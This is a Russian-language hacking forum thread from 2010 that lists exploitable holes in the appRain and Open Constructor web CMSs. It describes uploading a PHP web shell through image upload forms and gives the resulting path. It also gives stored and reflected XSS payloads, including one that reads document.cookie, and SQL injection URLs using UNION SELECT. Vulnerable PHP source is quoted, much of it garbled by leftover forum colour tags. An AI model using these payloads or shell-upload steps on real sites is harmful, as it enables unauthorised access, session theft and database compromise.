Off Site: http://www.apprain.com/
(1.11.2010)
Заливка шелла через админку
1. Способ| Gallery -> Add New Picture
написанно "*.jpg, *.gif, *.png" но шелл заливается удачно, адресс шелла /uploads/filemanager/ *** .php
2. Способ| Store-> Add New product
PHP код:
PHP:
[COLOR="#000000"]var uploadAllFiles, uploadOnlyImageFiles;
window.onload = function() {
uploadAllFiles = new SWFUpload({
// Backend Settings
upload_url: "[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]baseurl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/common/general_upload/'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]?>[/COLOR]",
post_params: {"PHPSESSID" : "[COLOR="#0000BB"][/COLOR]"},
// File Upload Settings
file_size_limit : "102400", // 100MB
file_types : "*.*",
file_types_description : "All Files",
file_upload_limit : "100",
file_queue_limit : "0",
.......[/COLOR]
Активная XSS
/member/signup
При регистрацыии Пользователя -> First Name - Last Name - Address
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_tag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"form"[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"method"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"post"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"app_form app_validation"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"signup_form"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"action"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baseurl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/member/signup"[/COLOR][COLOR="#007700"])));
echo[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_tag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"ul"[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]get_from_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"First Name"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]inputTag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"data[Member][f_name]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"input check_notempty"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'f_name'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'longdesc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Please enter your first name'[/COLOR][COLOR="#007700"])) );
echo[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]get_from_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Last Name"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]inputTag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"data[Member][l_name]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"input check_notempty"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'l_name'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'longdesc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Please enter your last name'[/COLOR][COLOR="#007700"])) );
echo[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]get_from_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Country"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]countryTag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"data[Member][country]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"title"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"Country"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"country"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"select check_notempty"[/COLOR][COLOR="#007700"]),array([/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Your Country'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'longdesc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Please select your country'[/COLOR][COLOR="#007700"])) );
echo[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]get_from_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Address"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]textareaTag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"data[Member][address]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"rows"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"3"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"input check_notempty"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'address'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'longdesc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Enter your address infomration'[/COLOR][COLOR="#007700"])) );[/COLOR][/COLOR]
/admin/account/edit
Сообщение от None
В админ панели -> First Name - Last Name
/information/manage/blog-post
Редактируем "Title" на ">window.location.href='http://www.google.de/';
/admin/config/general
Admin Setting -> Site Title
и во многих других местах админки
Пассивная XSS
www.localhost/quickstart/admin/forgotlogin
\development\view\system\admin\forgotlogin.phtml
Fotgoet Password-> Enter you Email Address ->
Сообщение от None
value="">alert(document.cookie)"
PHP код:
PHP:
[COLOR="#000000"][/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Admin'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Admin'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#0000BB"]?>[/COLOR]" />[/COLOR]
+
Search
\development\view\whitecloud\home\search.phtml
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Search Reasult for"[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]?>[/COLOR] '[COLOR="#0000BB"][/COLOR]'
[COLOR="#0000BB"]
[/COLOR] [COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Total result found "[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[COLOR="#0000BB"][/COLOR] [COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"]
[/COLOR] [COLOR="#0000BB"][/COLOR][COLOR="#0000BB"][/COLOR][/COLOR]
|
|
|
|
02.11.2010, 20:23
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Уязвимости Open Constructor
Тип уязвимости: SQL inj
Зависимости: Права админа
Куски уязвимых кодов:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT id, ds_type, obj_type FROM objects WHERE id='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);[/[/COLOR][COLOR="#0000BB"]B[/COLOR][COLOR="#007700"]]
[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ds_type'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'obj_type'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php?id='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
die();
}
[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ds_id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ds_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'new'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$pr[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getAllPages[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]WCDB[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]bo[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"](
[/COLOR][COLOR="#DD0000"]'SELECT id '[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'FROM dshtmltext '[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'WHERE ds_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ds_id
[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]))
unset([/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]]);
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$pr[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_record[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
}
require_once([/COLOR][COLOR="#0000BB"]LIBDIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/syntax/syntaxhighlighter._wc'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]= array();
[/COLOR][COLOR="#0000BB"]preg_match_all[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'~[/COLOR][COLOR="#0000BB"]allowedTags[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PREG_PATTERN_ORDER[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$allowed[/COLOR][COLOR="#007700"]= (array) @[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sDoc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]wrapDocument[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$save[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'new'[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'createdoc'[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'editdoc'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sDoc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'editdoc'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
Примеры:
localhost/../objects/edit.php?j=1&id=4%20union%20select%201,2,3--
localhost/../../htmltext/edit.php?ds_id=90&id=36%20union%20select%201,2,3,4 ,5,6,7,8--
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2302672){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2309061){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2402757){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2403619){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2411266){kind=avatar}
Линейный вид
